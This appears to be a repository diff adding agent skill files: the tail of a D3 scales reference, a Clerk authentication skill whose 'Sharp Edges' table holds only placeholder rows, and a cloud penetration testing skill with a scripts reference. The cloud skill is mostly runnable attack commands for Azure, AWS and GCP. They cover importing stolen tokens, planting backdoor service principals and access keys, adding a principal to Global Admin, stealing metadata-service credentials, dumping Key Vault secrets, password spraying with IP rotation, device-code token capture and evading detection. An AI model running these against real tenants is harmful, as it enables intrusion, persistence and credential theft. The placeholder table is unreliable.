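    return range[Math.max(0, Math.min(n - 1, i))]; // clamp to valid bucket
  };
  scale.thresholds = () =>
    Array.from({ length: n - 1 }, (_, i) => d0 + ((i + 1) * (d1 - d0)) / n);
  return scale;
}

const q = makeQuantize([0, 100], ['low', 'medium', 'high']);
console.log(q(25)); // 'low'
console.log(q(50)); // 'medium'
console.log(q(75)); // 'high'
console.log(q.thresholds()); // approximately [33.33, 66.67]
```
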
### Quantile scale

Maps continuous input to discrete output based on quantiles.

```javascript
const quantileScale = d3.scaleQuantile()
  .domain([3, 6, 7, 8, 8, 10, 13, 15, 16, 20, 24]) // Sample data
  .range(['low', 'medium', 'high']);

quantileScale(8);          // Returns based on quantile position
quantileScale.quantiles(); // Returns quantile thresholds
```

**Use cases:**
- Equal-size groups regardless of distribution
- Percentile-based categorisation
- Handling skewed distributions

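Unlike quantize, the thresholds here come from the sorted sample itself, so each bucket receives roughly the same number of values. A sketch using the common linear-interpolation quantile estimate (illustrative; D3 uses the same R-7 method):

```javascript
// Sketch of a quantile scale over an explicit sample.
function makeQuantile(domain, range) {
  const sorted = [...domain].sort((a, b) => a - b);
  const n = range.length;
  const quantiles = Array.from({ length: n - 1 }, (_, i) => {
    const p = ((i + 1) / n) * (sorted.length - 1); // fractional index
    const lo = Math.floor(p), hi = Math.ceil(p);
    return sorted[lo] + (sorted[hi] - sorted[lo]) * (p - lo);
  });
  const scale = x => {
    let i = 0;
    while (i < quantiles.length && x >= quantiles[i]) i++;
    return range[i];
  };
  scale.quantiles = () => quantiles;
  return scale;
}

const q = makeQuantile([3, 6, 7, 8, 8, 10, 13, 15, 16, 20, 24],
                       ['low', 'medium', 'high']);
console.log(q.quantiles()); // approximately [8, 14.33]
```
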
### Threshold scale

Maps continuous input to discrete output with custom thresholds.

```javascript
const thresholdScale = d3.scaleThreshold()
  .domain([0, 10, 20])
  .range(['freezing', 'cold', 'warm', 'hot']);

thresholdScale(-5); // Returns 'freezing'
thresholdScale(5);  // Returns 'cold'
thresholdScale(15); // Returns 'warm'
thresholdScale(25); // Returns 'hot'
```

**Use cases:**
- Custom breakpoints
- Grade boundaries (A, B, C, D, F)
- Temperature categories
- Air quality indices

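Note the shape: n thresholds split the line into n + 1 buckets, which is why the range has one more entry than the domain. A minimal sketch of the lookup:

```javascript
// Sketch of a threshold scale: advance past every threshold <= x.
function makeThreshold(domain, range) {
  return x => {
    let i = 0;
    while (i < domain.length && x >= domain[i]) i++;
    return range[i];
  };
}

const temp = makeThreshold([0, 10, 20], ['freezing', 'cold', 'warm', 'hot']);
console.log(temp(-5)); // 'freezing'
console.log(temp(5));  // 'cold'
console.log(temp(15)); // 'warm'
console.log(temp(25)); // 'hot'
```
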
## Sequential scales

### Sequential colour scale

Maps continuous input to continuous colour gradient.

```javascript
const colourScale = d3.scaleSequential(d3.interpolateBlues)
  .domain([0, 100]);

colourScale(0);   // Returns lightest blue
colourScale(50);  // Returns mid blue
colourScale(100); // Returns darkest blue
```

**Available interpolators:**

**Single hue:**
- `d3.interpolateBlues`, `d3.interpolateGreens`, `d3.interpolateReds`
- `d3.interpolateOranges`, `d3.interpolatePurples`, `d3.interpolateGreys`

**Multi-hue:**
- `d3.interpolateViridis`, `d3.interpolateInferno`, `d3.interpolateMagma`
- `d3.interpolatePlasma`, `d3.interpolateWarm`, `d3.interpolateCool`
- `d3.interpolateCubehelixDefault`, `d3.interpolateTurbo`

**Use cases:**
- Heat maps, choropleth maps
- Continuous data visualisation
- Temperature, elevation, density

### Diverging colour scale

Maps continuous input to diverging colour gradient with a midpoint.

```javascript
const divergingScale = d3.scaleDiverging(d3.interpolateRdBu)
  .domain([-10, 0, 10]);

divergingScale(-10); // Returns red
divergingScale(0);   // Returns white/neutral
divergingScale(10);  // Returns blue
```

**Available interpolators:**
- `d3.interpolateRdBu` - Red to blue
- `d3.interpolateRdYlBu` - Red, yellow, blue
- `d3.interpolateRdYlGn` - Red, yellow, green
- `d3.interpolatePiYG` - Pink, yellow, green
- `d3.interpolateBrBG` - Brown, blue-green
- `d3.interpolatePRGn` - Purple, green
- `d3.interpolatePuOr` - Purple, orange
- `d3.interpolateRdGy` - Red, grey
- `d3.interpolateSpectral` - Rainbow spectrum

**Use cases:**
- Data with meaningful midpoint (zero, average, neutral)
- Positive/negative values
- Above/below comparisons
- Correlation matrices

### Sequential quantile scale

Combines sequential colour with quantile mapping.

```javascript
const sequentialQuantileScale = d3.scaleSequentialQuantile(d3.interpolateBlues)
  .domain([3, 6, 7, 8, 8, 10, 13, 15, 16, 20, 24]);

// Maps based on quantile position
```

**Use cases:**
- Perceptually uniform binning
- Handling outliers
- Skewed distributions

## Ordinal scales

### Band scale

Maps discrete input to continuous bands (rectangles) with optional padding.

```javascript
const bandScale = d3.scaleBand()
  .domain(['A', 'B', 'C', 'D'])
  .range([0, 400])
  .padding(0.1);

bandScale('A');           // Returns start position (~9.8, after outer padding)
bandScale('B');           // Returns start position (~107.3)
bandScale.bandwidth();    // Returns width of each band (~87.8)
bandScale.step();         // Returns total step including padding
bandScale.paddingInner(); // Returns inner padding (between bands)
bandScale.paddingOuter(); // Returns outer padding (at edges)
```

**Use cases:**
- Bar charts (most common use case)
- Grouped elements
- Categorical axes
- Heat map cells

**Padding options:**
- `.padding(value)` - Sets both inner and outer padding (0-1)
- `.paddingInner(value)` - Padding between bands (0-1)
- `.paddingOuter(value)` - Padding at edges (0-1)
- `.align(value)` - Alignment of bands (0-1, default 0.5)

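The layout maths behind those numbers: step = range / (n - paddingInner + 2 * paddingOuter), bandwidth = step * (1 - paddingInner), and leftover space is distributed by `align`. A sketch with a single `padding` value used for both inner and outer (illustrative, not D3's implementation):

```javascript
// Sketch of band-scale layout maths (align = 0.5).
function makeBand(domain, [r0, r1], padding) {
  const n = domain.length;
  const step = (r1 - r0) / (n - padding + 2 * padding); // inner = outer = padding
  const bandwidth = step * (1 - padding);
  const start = r0 + (r1 - r0 - step * (n - padding)) / 2; // centre leftover
  const scale = d => start + domain.indexOf(d) * step;
  scale.bandwidth = () => bandwidth;
  scale.step = () => step;
  return scale;
}

const band = makeBand(['A', 'B', 'C', 'D'], [0, 400], 0.1);
console.log(band('A').toFixed(1));        // "9.8"
console.log(band('B').toFixed(1));        // "107.3"
console.log(band.bandwidth().toFixed(1)); // "87.8"
```
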
### Point scale

Maps discrete input to continuous points (no width).

```javascript
const pointScale = d3.scalePoint()
  .domain(['A', 'B', 'C', 'D'])
  .range([0, 400])
  .padding(0.5);

pointScale('A');    // Returns position (e.g., 50)
pointScale('B');    // Returns position (e.g., 150)
pointScale('C');    // Returns position (e.g., 250)
pointScale('D');    // Returns position (e.g., 350)
pointScale.step();  // Returns distance between points
```

**Use cases:**
- Line chart categorical x-axis
- Scatter plot with categorical axis
- Node positions in network graphs
- Any point positioning for categories

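A point scale is effectively a band scale with zero bandwidth: step = range / (n - 1 + 2 * padding). A sketch (illustrative only) reproducing the positions above:

```javascript
// Sketch of point-scale maths: evenly spaced points with edge padding.
function makePoint(domain, [r0, r1], padding) {
  const n = domain.length;
  const step = (r1 - r0) / (n - 1 + 2 * padding);
  const start = r0 + step * padding;
  const scale = d => start + domain.indexOf(d) * step;
  scale.step = () => step;
  return scale;
}

const point = makePoint(['A', 'B', 'C', 'D'], [0, 400], 0.5);
console.log(point('A'));   // 50
console.log(point('D'));   // 350
console.log(point.step()); // 100
```
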
### Ordinal colour scale

Maps discrete input to discrete output (colours, shapes, etc.).

```javascript
const colourScale = d3.scaleOrdinal(d3.schemeCategory10);

colourScale('apples');  // Returns first colour
colourScale('oranges'); // Returns second colour
colourScale('apples');  // Returns same first colour (consistent)

// Custom range
const customScale = d3.scaleOrdinal()
  .domain(['cat1', 'cat2', 'cat3'])
  .range(['#FF6B6B', '#4ECDC4', '#45B7D1']);
```

**Built-in colour schemes:**

**Categorical:**
- `d3.schemeCategory10` - 10 colours
- `d3.schemeAccent` - 8 colours
- `d3.schemeDark2` - 8 colours
- `d3.schemePaired` - 12 colours
- `d3.schemePastel1` - 9 colours
- `d3.schemePastel2` - 8 colours
- `d3.schemeSet1` - 9 colours
- `d3.schemeSet2` - 8 colours
- `d3.schemeSet3` - 12 colours
- `d3.schemeTableau10` - 10 colours

**Use cases:**
- Category colours
- Legend items
- Multi-series charts
- Network node types

## Scale utilities

### Nice domain

Extend domain to nice round values.

```javascript
const scale = d3.scaleLinear()
  .domain([0.201, 0.996])
  .nice();

scale.domain(); // Returns [0.2, 1.0]

// With count (approximate tick count)
const scale2 = d3.scaleLinear()
  .domain([0.201, 0.996])
  .nice(5);
```

### Clamping

Restrict output to range bounds.

```javascript
const scale = d3.scaleLinear()
  .domain([0, 100])
  .range([0, 500])
  .clamp(true);

scale(-10); // Returns 0 (clamped)
scale(150); // Returns 500 (clamped)
```

### Copy scales

Create independent copies.

```javascript
const scale1 = d3.scaleLinear()
  .domain([0, 100])
  .range([0, 500]);

const scale2 = scale1.copy();
// scale2 is independent of scale1
```

### Tick generation

Generate nice tick values for axes.

```javascript
const scale = d3.scaleLinear()
  .domain([0, 100])
  .range([0, 500]);

scale.ticks(10);             // Generate ~10 ticks
scale.tickFormat(10);        // Get format function for ticks
scale.tickFormat(10, ".2f"); // Custom format (2 decimal places)

// Time scale ticks
const timeScale = d3.scaleTime()
  .domain([new Date(2020, 0, 1), new Date(2024, 0, 1)]);

timeScale.ticks(d3.timeYear);     // Yearly ticks
timeScale.ticks(d3.timeMonth, 3); // Every 3 months
timeScale.tickFormat(5, "%Y-%m"); // Format as year-month
```

## Colour spaces and interpolation

### RGB interpolation

```javascript
const scale = d3.scaleLinear()
  .domain([0, 100])
  .range(["blue", "red"]);
// Default: RGB interpolation
```

### HSL interpolation

```javascript
const scale = d3.scaleLinear()
  .domain([0, 100])
  .range(["blue", "red"])
  .interpolate(d3.interpolateHsl);
// Smoother colour transitions
```

### Lab interpolation

```javascript
const scale = d3.scaleLinear()
  .domain([0, 100])
  .range(["blue", "red"])
  .interpolate(d3.interpolateLab);
// Perceptually uniform
```

### HCL interpolation

```javascript
const scale = d3.scaleLinear()
  .domain([0, 100])
  .range(["blue", "red"])
  .interpolate(d3.interpolateHcl);
// Perceptually uniform with hue
```

## Common patterns

### Diverging scale with custom midpoint

```javascript
const scale = d3.scaleLinear()
  .domain([min, midpoint, max])
  .range(["red", "white", "blue"])
  .interpolate(d3.interpolateHcl);
```

### Multi-stop gradient scale

```javascript
const scale = d3.scaleLinear()
  .domain([0, 25, 50, 75, 100])
  .range(["#d53e4f", "#fc8d59", "#fee08b", "#e6f598", "#66c2a5"]);
```

### Radius scale for circles (perceptual)

```javascript
const radiusScale = d3.scaleSqrt()
  .domain([0, d3.max(data, d => d.value)])
  .range([0, 50]);

// Use with circles
circle.attr("r", d => radiusScale(d.value));
```

### Adaptive scale based on data range

```javascript
function createAdaptiveScale(data) {
  const extent = d3.extent(data);

  // Use log scale if data spans >2 orders of magnitude
  if (extent[1] / extent[0] > 100) {
    return d3.scaleLog()
      .domain(extent)
      .range([0, width]);
  }

  // Otherwise use linear
  return d3.scaleLinear()
    .domain(extent)
    .range([0, width]);
}
```

### Colour scale with explicit categories

```javascript
const colourScale = d3.scaleOrdinal()
  .domain(['Low Risk', 'Medium Risk', 'High Risk'])
  .range(['#2ecc71', '#f39c12', '#e74c3c'])
  .unknown('#95a5a6'); // Fallback for unknown values
```

56 skills/clerk-auth/SKILL.md Normal file
@@ -0,0 +1,56 @@

---
name: clerk-auth
description: "Expert patterns for Clerk auth implementation, middleware, organizations, webhooks, and user sync. Use when: adding authentication, clerk auth, user authentication, sign in, sign up."
source: vibeship-spawner-skills (Apache 2.0)
---

# Clerk Authentication

## Patterns

### Next.js App Router Setup

Complete Clerk setup for Next.js 14/15 App Router. Includes ClerkProvider, environment variables, and basic sign-in/sign-up components.

Key components:
- `<ClerkProvider>`: Wraps the app for auth context
- `<SignIn />`, `<SignUp />`: Pre-built auth forms
- `<UserButton />`: User menu with session management

### Middleware Route Protection

Protect routes using clerkMiddleware and createRouteMatcher.

Best practices:
- Single middleware.ts file at project root
- Use createRouteMatcher for route groups
- auth.protect() for explicit protection
- Centralize all auth logic in middleware

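Conceptually, createRouteMatcher compiles glob-style patterns such as `'/dashboard(.*)'` into regular expressions and tests the request path against them. A rough dependency-free sketch of that idea (a hypothetical helper, not Clerk's actual implementation, which supports richer syntax):

```javascript
// Hypothetical route matcher: "(.*)" is a wildcard, everything else literal.
function createRouteMatcher(patterns) {
  const regexes = patterns.map(p => {
    const source = p.split('(.*)').map(part =>
      part.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')).join('(.*)');
    return new RegExp('^' + source + '$');
  });
  return path => regexes.some(r => r.test(path));
}

const isProtected = createRouteMatcher(['/dashboard(.*)', '/settings']);
console.log(isProtected('/dashboard/billing')); // true
console.log(isProtected('/settings'));          // true
console.log(isProtected('/'));                  // false
```
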
### Server Component Authentication

Access auth state in Server Components using auth() and currentUser().

Key functions:
- auth(): Returns userId, sessionId, orgId, claims
- currentUser(): Returns full User object
- Both require clerkMiddleware to be configured

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |

498 skills/cloud-penetration-testing/SKILL.md Normal file
@@ -0,0 +1,498 @@

---
name: Cloud Penetration Testing
description: This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". It provides comprehensive techniques for security assessment across major cloud platforms.
---

# Cloud Penetration Testing

## Purpose

Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.

## Prerequisites

### Required Tools

```bash
# Azure tools (run in PowerShell)
Install-Module -Name Az -AllowClobber -Force
Install-Module -Name MSOnline -Force
Install-Module -Name AzureAD -Force

# AWS CLI
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip && sudo ./aws/install

# GCP CLI
curl https://sdk.cloud.google.com | bash
gcloud init

# Additional tools
pip install scoutsuite pacu
```

### Required Knowledge
- Cloud architecture fundamentals
- Identity and Access Management (IAM)
- API authentication mechanisms
- DevOps and automation concepts

### Required Access
- Written authorization for testing
- Test credentials or access tokens
- Defined scope and rules of engagement

## Outputs and Deliverables

1. **Cloud Security Assessment Report** - Comprehensive findings and risk ratings
2. **Resource Inventory** - Enumerated services, storage, and compute instances
3. **Credential Findings** - Exposed secrets, keys, and misconfigurations
4. **Remediation Recommendations** - Hardening guidance per platform

## Core Workflow

### Phase 1: Reconnaissance

Gather initial information about target cloud presence:

```bash
# Azure: Get federation info
curl "https://login.microsoftonline.com/getuserrealm.srf?login=user@target.com&xml=1"

# Azure: Get Tenant ID
curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"

# Enumerate cloud resources by company name
python3 cloud_enum.py -k targetcompany

# Check IP against cloud providers
cat ips.txt | python3 ip2provider.py
```

### Phase 2: Azure Authentication

Authenticate to Azure environments:

```powershell
# Az PowerShell Module
Import-Module Az
Connect-AzAccount

# With credentials (may bypass MFA)
$credential = Get-Credential
Connect-AzAccount -Credential $credential

# Import stolen context
Import-AzContext -Profile 'C:\Temp\StolenToken.json'

# Export context for persistence
Save-AzContext -Path C:\Temp\AzureAccessToken.json

# MSOnline Module
Import-Module MSOnline
Connect-MsolService
```

### Phase 3: Azure Enumeration

Discover Azure resources and permissions:

```powershell
# List contexts and subscriptions
Get-AzContext -ListAvailable
Get-AzSubscription

# Current user role assignments
Get-AzRoleAssignment

# List resources
Get-AzResource
Get-AzResourceGroup

# Storage accounts
Get-AzStorageAccount

# Web applications
Get-AzWebApp

# SQL Servers and databases
Get-AzSqlServer
Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG

# Virtual machines
Get-AzVM
$vm = Get-AzVM -Name "VMName"
$vm.OSProfile

# List all users
Get-MsolUser -All

# List all groups
Get-MsolGroup -All

# Global Admins
Get-MsolRole -RoleName "Company Administrator"
Get-MsolGroupMember -GroupObjectId $GUID

# Service Principals
Get-MsolServicePrincipal
```

### Phase 4: Azure Exploitation

Exploit Azure misconfigurations:

```powershell
# Search user attributes for passwords
$users = Get-MsolUser -All
foreach($user in $users){
    $props = @()
    $user | Get-Member | ForEach-Object { $props += $_.Name }
    foreach($prop in $props){
        if($user.$prop -like "*password*"){
            Write-Output ("[*] " + $user.UserPrincipalName + " [" + $prop + "] : " + $user.$prop)
        }
    }
}

# Execute commands on VMs
Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1

# Extract VM UserData
$vms = Get-AzVM
$vms.UserData

# Dump Key Vault secrets
az keyvault list --query '[].name' --output tsv
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
az keyvault secret list --vault-name <vault> --query '[].id' --output tsv
az keyvault secret show --id <URI>
```

### Phase 5: Azure Persistence

Establish persistence in Azure:

```powershell
# Create backdoor service principal
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)

# Add service principal to Global Admin
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId

# Login as service principal
$cred = Get-Credential # AppID as username, secret as password
Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal

# Create new admin user via CLI
az ad user create --display-name <name> --password <pass> --user-principal-name <upn>
```

### Phase 6: AWS Authentication

Authenticate to AWS environments:

```bash
# Configure AWS CLI
aws configure
# Enter: Access Key ID, Secret Access Key, Region, Output format

# Use specific profile
aws configure --profile target

# Test credentials
aws sts get-caller-identity
```

### Phase 7: AWS Enumeration

Discover AWS resources:

```bash
# Account information
aws sts get-caller-identity
aws iam list-users
aws iam list-roles

# S3 Buckets
aws s3 ls
aws s3 ls s3://bucket-name/
aws s3 sync s3://bucket-name ./local-dir

# EC2 Instances
aws ec2 describe-instances

# RDS Databases
aws rds describe-db-instances --region us-east-1

# Lambda Functions
aws lambda list-functions --region us-east-1
aws lambda get-function --function-name <name>

# EKS Clusters
aws eks list-clusters --region us-east-1

# Networking
aws ec2 describe-subnets
aws ec2 describe-security-groups --group-ids <sg-id>
aws directconnect describe-connections
```

### Phase 8: AWS Exploitation

Exploit AWS misconfigurations:

```bash
# Check for public RDS snapshots
aws rds describe-db-snapshots --snapshot-type manual --query=DBSnapshots[*].DBSnapshotIdentifier
aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id>
# AttributeValues = "all" means publicly accessible

# Extract Lambda environment variables (may contain secrets)
aws lambda get-function --function-name <name> | jq '.Configuration.Environment'

# Access metadata service (from compromised EC2)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# IMDSv2 access
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
```

### Phase 9: AWS Persistence

Establish persistence in AWS:

```bash
# List existing access keys
aws iam list-access-keys --user-name <username>

# Create backdoor access key
aws iam create-access-key --user-name <username>

# Get all EC2 public IPs
for region in $(cat regions.txt); do
    aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $region | jq -r '.[]'
done
```

### Phase 10: GCP Enumeration

Discover GCP resources:

```bash
# Authentication
gcloud auth login
gcloud auth activate-service-account --key-file creds.json
gcloud auth list

# Account information
gcloud config list
gcloud organizations list
gcloud projects list

# IAM Policies
gcloud organizations get-iam-policy <org-id>
gcloud projects get-iam-policy <project-id>

# Enabled services
gcloud services list

# Source code repos
gcloud source repos list
gcloud source repos clone <repo>

# Compute instances
gcloud compute instances list
gcloud beta compute ssh --zone "region" "instance" --project "project"

# Storage buckets
gsutil ls
gsutil ls -r gs://bucket-name
gsutil cp gs://bucket/file ./local

# SQL instances
gcloud sql instances list
gcloud sql databases list --instance <id>

# Kubernetes
gcloud container clusters list
gcloud container clusters get-credentials <cluster> --region <region>
kubectl cluster-info
```

### Phase 11: GCP Exploitation

Exploit GCP misconfigurations:

```bash
# Get metadata service data
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"

# Check access scopes
curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor: Google'

# Decrypt data with keyring
gcloud kms decrypt --ciphertext-file=encrypted.enc --plaintext-file=out.txt --key <key> --keyring <keyring> --location global

# Serverless function analysis
gcloud functions list
gcloud functions describe <name>
gcloud functions logs read <name> --limit 100

# Find stored credentials
sudo find /home -name "credentials.db"
sudo cp -r /home/user/.config/gcloud ~/.config
gcloud auth list
```

## Quick Reference

### Azure Key Commands

| Action | Command |
|--------|---------|
| Login | `Connect-AzAccount` |
| List subscriptions | `Get-AzSubscription` |
| List users | `Get-MsolUser -All` |
| List groups | `Get-MsolGroup -All` |
| Current roles | `Get-AzRoleAssignment` |
| List VMs | `Get-AzVM` |
| List storage | `Get-AzStorageAccount` |
| Key Vault secrets | `az keyvault secret list --vault-name <name>` |

### AWS Key Commands

| Action | Command |
|--------|---------|
| Configure | `aws configure` |
| Caller identity | `aws sts get-caller-identity` |
| List users | `aws iam list-users` |
| List S3 buckets | `aws s3 ls` |
| List EC2 | `aws ec2 describe-instances` |
| List Lambda | `aws lambda list-functions` |
| Metadata | `curl http://169.254.169.254/latest/meta-data/` |

### GCP Key Commands

| Action | Command |
|--------|---------|
| Login | `gcloud auth login` |
| List projects | `gcloud projects list` |
| List instances | `gcloud compute instances list` |
| List buckets | `gsutil ls` |
| List clusters | `gcloud container clusters list` |
| IAM policy | `gcloud projects get-iam-policy <project>` |
| Metadata | `curl -H "Metadata-Flavor: Google" http://metadata.google.internal/...` |

### Metadata Service URLs

| Provider | URL |
|----------|-----|
| AWS | `http://169.254.169.254/latest/meta-data/` |
| Azure | `http://169.254.169.254/metadata/instance?api-version=2018-02-01` |
| GCP | `http://metadata.google.internal/computeMetadata/v1/` |

### Useful Tools

| Tool | Purpose |
|------|---------|
| ScoutSuite | Multi-cloud security auditing |
| Pacu | AWS exploitation framework |
| AzureHound | Azure AD attack path mapping |
| ROADTools | Azure AD enumeration |
| WeirdAAL | AWS service enumeration |
| MicroBurst | Azure security assessment |
| PowerZure | Azure post-exploitation |

## Constraints and Limitations

### Legal Requirements
- Only test with explicit written authorization
- Respect scope boundaries between cloud accounts
- Do not access production customer data
- Document all testing activities

### Technical Limitations
- MFA may prevent credential-based attacks
- Conditional Access policies may restrict access
- CloudTrail/Activity Logs record all API calls
- Some resources require specific regional access

### Detection Considerations
- Cloud providers log all API activity
- Unusual access patterns trigger alerts
- Use slow, deliberate enumeration
- Consider GuardDuty, Security Center, Cloud Armor

## Examples

### Example 1: Azure Password Spray

**Scenario:** Test Azure AD password policy

```powershell
# Using MSOLSpray with FireProx for IP rotation
# First create a FireProx endpoint
python fire.py --access_key <key> --secret_access_key <secret> --region us-east-1 --url https://login.microsoft.com --command create

# Spray passwords
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\users.txt -Password "Spring2024!" -URL https://<api-gateway>.execute-api.us-east-1.amazonaws.com/fireprox
```

### Example 2: AWS S3 Bucket Enumeration

**Scenario:** Find and access misconfigured S3 buckets

```bash
# List all buckets
aws s3 ls | awk '{print $3}' > buckets.txt

# Check each bucket for contents
while read bucket; do
  echo "Checking: $bucket"
  aws s3 ls s3://$bucket 2>/dev/null
done < buckets.txt

# Download an interesting bucket
aws s3 sync s3://misconfigured-bucket ./loot/
```

### Example 3: GCP Service Account Compromise

**Scenario:** Pivot using a compromised service account

```bash
# Authenticate with the service account key
gcloud auth activate-service-account --key-file compromised-sa.json

# List accessible projects
gcloud projects list

# Enumerate compute instances
gcloud compute instances list --project target-project

# Check for SSH keys in metadata
gcloud compute project-info describe --project target-project | grep ssh

# SSH to an instance
gcloud beta compute ssh instance-name --zone us-central1-a --project target-project
```

## Troubleshooting

| Issue | Solutions |
|-------|-----------|
| Authentication failures | Verify credentials; check MFA; ensure correct tenant/project; try alternative auth methods |
| Permission denied | List current roles; try different resources; check resource policies; verify region |
| Metadata service blocked | Check IMDSv2 (AWS); verify instance role; check firewall for 169.254.169.254 |
| Rate limiting | Add delays; spread across regions; use multiple credentials; focus on high-value targets |

## References

- [Advanced Cloud Scripts](references/advanced-cloud-scripts.md) - Azure Automation runbooks, Function Apps enumeration, AWS data exfiltration, GCP advanced exploitation

@@ -0,0 +1,318 @@

# Advanced Cloud Pentesting Scripts

Reference: [Cloud Pentesting Cheatsheet by Beau Bullock](https://github.com/dafthack/CloudPentestCheatsheets)

## Azure Automation Runbooks

### Export All Runbooks from All Subscriptions

```powershell
$subs = Get-AzSubscription
foreach($s in $subs){
    $subscriptionid = $s.SubscriptionId
    mkdir .\$subscriptionid\
    Select-AzSubscription -Subscription $subscriptionid
    $runbooks = @()
    $autoaccounts = Get-AzAutomationAccount | Select-Object AutomationAccountName,ResourceGroupName
    foreach ($i in $autoaccounts){
        $runbooks += Get-AzAutomationRunbook -AutomationAccountName $i.AutomationAccountName -ResourceGroupName $i.ResourceGroupName | Select-Object AutomationAccountName,ResourceGroupName,Name
    }
    foreach($r in $runbooks){
        Export-AzAutomationRunbook -AutomationAccountName $r.AutomationAccountName -ResourceGroupName $r.ResourceGroupName -Name $r.Name -OutputFolder .\$subscriptionid\
    }
}
```

### Export All Automation Job Outputs

```powershell
$subs = Get-AzSubscription
$jobout = @()
foreach($s in $subs){
    $subscriptionid = $s.SubscriptionId
    Select-AzSubscription -Subscription $subscriptionid
    $jobs = @()
    $autoaccounts = Get-AzAutomationAccount | Select-Object AutomationAccountName,ResourceGroupName
    foreach ($i in $autoaccounts){
        $jobs += Get-AzAutomationJob -AutomationAccountName $i.AutomationAccountName -ResourceGroupName $i.ResourceGroupName | Select-Object AutomationAccountName,ResourceGroupName,JobId
    }
    foreach($r in $jobs){
        $jobout += Get-AzAutomationJobOutput -AutomationAccountName $r.AutomationAccountName -ResourceGroupName $r.ResourceGroupName -JobId $r.JobId
    }
}
$jobout | Out-File -Encoding ascii joboutputs.txt
```

## Azure Function Apps

### List All Function App Hostnames

```powershell
$functionapps = Get-AzFunctionApp
foreach($f in $functionapps){
    $f.EnabledHostname
}
```

### Extract Function App Information

```powershell
$subs = Get-AzSubscription
$allfunctioninfo = @()
foreach($s in $subs){
    $subscriptionid = $s.SubscriptionId
    Select-AzSubscription -Subscription $subscriptionid
    $functionapps = Get-AzFunctionApp
    foreach($f in $functionapps){
        $allfunctioninfo += $f.config | Select-Object AcrUseManagedIdentityCred,AcrUserManagedIdentityId,AppCommandLine,ConnectionString,CorSupportCredentials,CustomActionParameter
        $allfunctioninfo += $f.SiteConfig | fl
        $allfunctioninfo += $f.ApplicationSettings | fl
        $allfunctioninfo += $f.IdentityUserAssignedIdentity.Keys | fl
    }
}
$allfunctioninfo
```

## Azure Device Code Login Flow

### Initiate Device Code Login

```powershell
$body = @{
    "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
    "resource"  = "https://graph.microsoft.com"
}
$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
$Headers = @{}
$Headers["User-Agent"] = $UserAgent
$authResponse = Invoke-RestMethod `
    -UseBasicParsing `
    -Method Post `
    -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
    -Headers $Headers `
    -Body $body
$authResponse
```

Navigate to https://microsoft.com/devicelogin and enter the user code from `$authResponse`.

### Retrieve Access Tokens

Run this after the user has completed the device login; until then the endpoint returns `authorization_pending`.

```powershell
$body = @{
    "client_id"  = "1950a258-227b-4e31-a9cf-717495945fc2"
    "grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
    "code"       = $authResponse.device_code
}
$Tokens = Invoke-RestMethod `
    -UseBasicParsing `
    -Method Post `
    -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" `
    -Headers $Headers `
    -Body $body
$Tokens
```

## Azure Managed Identity Token Retrieval

```powershell
# From an Azure VM
Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com' -Method GET -Headers @{Metadata="true"} -UseBasicParsing

# Full instance metadata
$instance = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$instance
```

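The token response is JSON, so the bearer token can be pulled out with `jq` and attached to Azure Resource Manager requests. A sketch (the sample response is illustrative, not real output, and the follow-up request is printed rather than executed):

```shell
# Extract access_token from the IMDS response and build an ARM request.
# $response is a stand-in; in practice pipe the curl/Invoke-WebRequest body in.
response='{"access_token":"eyJ0eXAi-EXAMPLE","expires_in":"3599","token_type":"Bearer"}'
token=$(printf '%s' "$response" | jq -r '.access_token')

# Print the follow-up request rather than executing it
echo "curl -s -H \"Authorization: Bearer $token\" \"https://management.azure.com/subscriptions?api-version=2020-01-01\""
```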
